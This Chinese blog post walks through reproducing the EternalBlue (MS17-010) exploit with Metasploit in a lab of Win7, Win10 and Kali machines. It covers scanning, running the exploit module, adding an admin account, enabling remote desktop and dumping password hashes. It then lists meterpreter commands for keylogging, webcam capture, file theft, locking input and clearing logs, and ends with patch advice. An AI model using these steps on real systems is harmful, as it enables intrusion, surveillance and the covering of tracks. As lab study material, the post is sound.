<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="July-above">
    
    <title>
        
            永恒之蓝木马复现 |
        
        July-above
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/logo.svg">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/brands.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"en"}
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true},"style":{"primary_color":"#0066cc","logo":"/images/logo.svg","favicon":"/images/logo.svg","avatar":"/images/avatar.svg","font_size":null,"font_family":null,"hover":{"shadow":false,"scale":false},"first_screen":{"enable":false,"header_transparent":false,"background_img":"/images/bg.svg","description":"黄色的森林分出两条路 || 我选择人迹更少的那一条，从此决定我一生的道路。","font_color":null,"hitokoto":false},"scroll":{"progress_bar":false,"percent":false}},"local_search":{"enable":false,"preload":false},"code_copy":{},"code_block":{"tools":{"enable":false,"style":"default"},"highlight_theme":"default"},"side_tools":{},"pjax":{"enable":false},"lazyload":{"enable":false},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.8"},"waline":{"server_url":null,"reaction":false,"version":2}},"post":{"author_label":{"enable":true,"auto":true,"custom_label_list":["Trainee","Engineer","Architect"]},"word_count":{"enable":false,"wordcount":false,"min2read":false},"img_align":"left","copyright_info":false},"version":"3.6.1"}
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"}
    KEEP.language_code_block = {"copy":"Copy code","copied":"Copied","fold":"Fold code block","folded":"Folded"}
    KEEP.language_copy_copyright = {"copy":"Copy copyright info","copied":"Copied","title":"Original article title","author":"Original article author","link":"Original article link"}
  </script>
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
<div class="progress-bar-container">
    

    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/logo.svg">
                </a>
            
            <a class="logo-title" href="/">
               July-above
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                主页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                    
                </ul>
            </div>
            <div class="mobile">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">主页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            <div class="article-title">
                <span class="title-hover-animation">永恒之蓝木马复现</span>
            </div>

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="/images/avatar.svg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">July-above</span>
                            
                                <span class="author-label">Lv3</span>
                            
                        </div>
                        <div class="meta-info">
                            
<div class="article-meta-info">
    <span class="article-date article-meta-item">
        
            <i class="fa-regular fa-calendar-plus"></i>&nbsp;
        
        <span class="pc">2023-01-31 21:15:50</span>
        <span class="mobile">2023-01-31 21:15</span>
    </span>
    
        <span class="article-update-date article-meta-item">
        <i class="fas fa-file-pen"></i>&nbsp;
        <span class="pc">2023-02-23 15:08:07</span>
    </span>
    
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content keep-markdown-body">
                

                <h3 id="一、永恒之蓝的介绍"><a href="#一、永恒之蓝的介绍" class="headerlink" title="一、永恒之蓝的介绍"></a>一、永恒之蓝的介绍</h3><p>永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。</p>
<h3 id="二、漏洞描述"><a href="#二、漏洞描述" class="headerlink" title="二、漏洞描述"></a>二、漏洞描述</h3><p>恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。</p>
<p>本次黑客使用的是Petya勒索病毒的变种Petwarp，攻击时仍然使用了永恒之蓝勒索漏洞，并会获取系统用户名与密码进行内网传播。</p>
<p>本次爆发使用了已知OFFICE漏洞、永恒之蓝SMB漏洞、局域网感染等网络自我复制技术，使得病毒可以在短时间内呈爆发态势。同时，该病毒与普通勒索病毒不同，其不会对电脑中的每个文件都进行加密，而是通过加密硬盘驱动器主文件表(MFT)，使主引导记录(MBR)不可操作，通过占用物理磁盘上的文件名，大小和位置的信息来限制对完整系统的访问，从而让电脑无法启动，相较普通勒索病毒对系统更具破坏性。</p>
<h3 id="三、MSF介绍"><a href="#三、MSF介绍" class="headerlink" title="三、MSF介绍"></a>三、MSF介绍</h3><p>Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了，此工具在kali中是自带的。</p>
<h3 id="四、漏洞复现"><a href="#四、漏洞复现" class="headerlink" title="四、漏洞复现"></a>四、漏洞复现</h3><ol>
<li>复现环境</li>
</ol>
<p>​    win7（192.168.8.146）（实验前将防火墙彻底关闭）</p>
<p>​    win10（192.168.8.8）后续攻击使用</p>
<p>​    kali（192.168.8.145）</p>
<ol start="2">
<li>先使用nmap对目标机进行扫描，查看其445端口是否开启</li>
</ol>
<p><img src="/img/yonghengzhilan/image-20230131212303381.png" alt="image-20230131212303381"></p>
<ol start="3">
<li>在终端输入msfconsole进入MSF</li>
</ol>
<p><img src="/img/yonghengzhilan/image-20230131212342981.png" alt="image-20230131212342981"></p>
<ol start="4">
<li>使用msf中的查找命令搜索关于永恒之蓝的脚本：search ms17—010</li>
</ol>
<p>​        其中：auxiliary为辅助模块脚本；exploit为攻击模块脚本。</p>
<p><img src="/img/yonghengzhilan/image-20230131212508203.png" alt="image-20230131212508203"></p>
<ol start="5">
<li>使用ms17-010辅助模块</li>
</ol>
<p>​        使用模块 use 粘贴模块</p>
<p><img src="/img/yonghengzhilan/image-20230131212608097.png" alt="image-20230131212608097"></p>
<ol start="6">
<li>配置ms17-010的辅助性脚本</li>
</ol>
<p>​        查看配置：show options</p>
<p><img src="/img/yonghengzhilan/image-20230131212635276.png" alt="image-20230131212635276"></p>
<ol start="7">
<li>配置目标机IP地址：set RHOST +目标机ip</li>
</ol>
<p><img src="/img/yonghengzhilan/image-20230131212711871.png" alt="image-20230131212711871"></p>
<ol start="8">
<li>配置成功后，执行ms17-010的辅助性脚本run #运行模块</li>
</ol>
<p><img src="/img/yonghengzhilan/image-20230131212732119.png" alt="image-20230131212732119"></p>
<ol start="9">
<li>使用ms17-010攻击模块</li>
</ol>
<p>​        使用模块 use 粘贴模块</p>
<p><img src="/img/yonghengzhilan/image-20230131212753631.png" alt="image-20230131212753631"></p>
<ol start="10">
<li>查看配置项</li>
</ol>
<p>​        查看配置：show options</p>
<p><img src="/img/yonghengzhilan/image-20230131212818176.png" alt="image-20230131212818176"></p>
<ol start="11">
<li>设置被攻击机的ip地址：set RHOST +目标机ip</li>
</ol>
<p><img src="/img/yonghengzhilan/image-20230131212852120.png" alt="image-20230131212852120"></p>
<ol start="12">
<li>运行ms17-010攻击模块</li>
</ol>
<p><img src="/img/yonghengzhilan/image-20230131212909872.png" alt="image-20230131212909872"></p>
<ol start="13">
<li>成功建立会话后，使用一些功能shell</li>
</ol>
<p>​        在此处可对目标机使用dos命令进行操作</p>
<p>​        使用exit可退出win7终端</p>
<ol start="14">
<li>入侵成功后</li>
</ol>
<p>​        开启远程终端：需要双终端操作</p>
<p>​        在shell中，新建一个用户,将其加入管理员组</p>
<p><img src="/img/yonghengzhilan/image-20230131213005792.png" alt="image-20230131213005792"></p>
<p><img src="/img/yonghengzhilan/image-20230131213018961.png" alt="image-20230131213018961"></p>
<p>在meterpreter下使用run getgui -e，试目标机打开允许被远程连接</p>
<p><img src="/img/yonghengzhilan/image-20230131213044391.png" alt="image-20230131213044391"></p>
<p><img src="/img/yonghengzhilan/image-20230131213106156.png" alt="image-20230131213106156"></p>
<p>用win10进行远控</p>
<p><img src="/img/yonghengzhilan/image-20230131213147612.png" alt="image-20230131213147612"></p>
<ul>
<li><p>在meterpreter下进行进一步实验</p>
</li>
<li><p>查看靶机相关进程信息：ps</p>
</li>
</ul>
<p><img src="/img/yonghengzhilan/image-20230131213420410.png" alt="image-20230131213420410"></p>
<ul>
<li>查看靶机相关信息：sysinfo</li>
</ul>
<p><img src="/img/yonghengzhilan/image-20230131213441745.png" alt="image-20230131213441745"></p>
<ul>
<li>截图：screenshot</li>
</ul>
<p><img src="/img/yonghengzhilan/image-20230131213456656.png" alt="image-20230131213456656"></p>
<ul>
<li><p>获取靶机hash,破解密码：hashdump</p>
</li>
<li><p>输入hashdump</p>
</li>
</ul>
<p><img src="/img/yonghengzhilan/image-20230131213522519.png" alt="image-20230131213522519"></p>
<ul>
<li>寻找一个在线MD5解密网站进行解密</li>
</ul>
<hr>
<p>还有很多其他的操作这里就不一一演示了</p>
<p>run scraper #查看目标主机详细信息</p>
<p>load kiwi    #加载</p>
<p>pwd    #查看目标当前目录(windows)</p>
<p>getlwd   #查看目标当前目录(Linux)</p>
<p>search -f *.jsp -d e:\        #搜索E盘中所有以.jsp为后缀的文件</p>
<p>download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下</p>
<p>upload /root/test.txt d:\test   #将/root/test.txt上传到目标机的 d:\test\ 目录下</p>
<p>getpid    #查看当前Meterpreter Shell的进程</p>
<p>idletime  #查看主机运行时间</p>
<p>getuid    #查看获取的当前权限</p>
<p>screenshot #截图</p>
<p>webcam_list #查看目标主机的摄像头</p>
<p>webcam_snap #拍照</p>
<p>webcam_stream                #开视频</p>
<p>execute 参数 -f 可执行文件 #执行可执行程序</p>
<p>run getgui -e          #开启远程桌面</p>
<p>keyscan_start          #开启键盘记录功能</p>
<p>keyscan_dump        #显示捕捉到的键盘记录信息</p>
<p>keyscan_stop         #停止键盘记录功能</p>
<p>uictl disable keyboard     #禁止目标使用键盘</p>
<p>uictl enable keyboard     #允许目标使用键盘</p>
<p>uictl disable mouse       #禁止目标使用鼠标</p>
<p>uictl enable mouse     #允许目标使用鼠标</p>
<p>clearev            #清除日志</p>
<h3 id="修复方法"><a href="#修复方法" class="headerlink" title="修复方法"></a>修复方法</h3><p>1.关闭bios服务，或开启防火墙，屏蔽服务端口</p>
<p>2.给系统打上永恒之蓝的漏洞修复补丁</p>

            </div>

            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">#漏洞复现</a>&nbsp;
                        </li>
                    
                </ul>
            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                               rel="prev"
                               href="/2023/02/04/processliaotianruanjian/"
                            >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                                <span class="title flex-center">
                                <span class="post-nav-title-item">python进程池聊天软件</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                            </a>
                        </div>
                    
                    
                </div>
            

            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E7%9A%84%E4%BB%8B%E7%BB%8D"><span class="nav-text">一、永恒之蓝的介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="nav-text">二、漏洞描述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%89%E3%80%81MSF%E4%BB%8B%E7%BB%8D"><span class="nav-text">三、MSF介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-text">四、漏洞复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BF%AE%E5%A4%8D%E6%96%B9%E6%B3%95"><span class="nav-text">修复方法</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            
<footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
                <span>2020</span> -
            
            2023
            
                &nbsp;<i class="fas fa-heart icon-animate"></i>
                &nbsp;<a href="/">July-above</a>
            
        </div>
        
        <div class="theme-info info-item">
            Powered by <a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;|&nbsp;Theme&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.6.1</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/dark-light-toggle.js"></script>









<div class="post-scripts">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/post-helper.js"></script>
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/libs/anime.min.js"></script>
        
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/toc.js"></script>
        
    
</div>



</body>
</html>
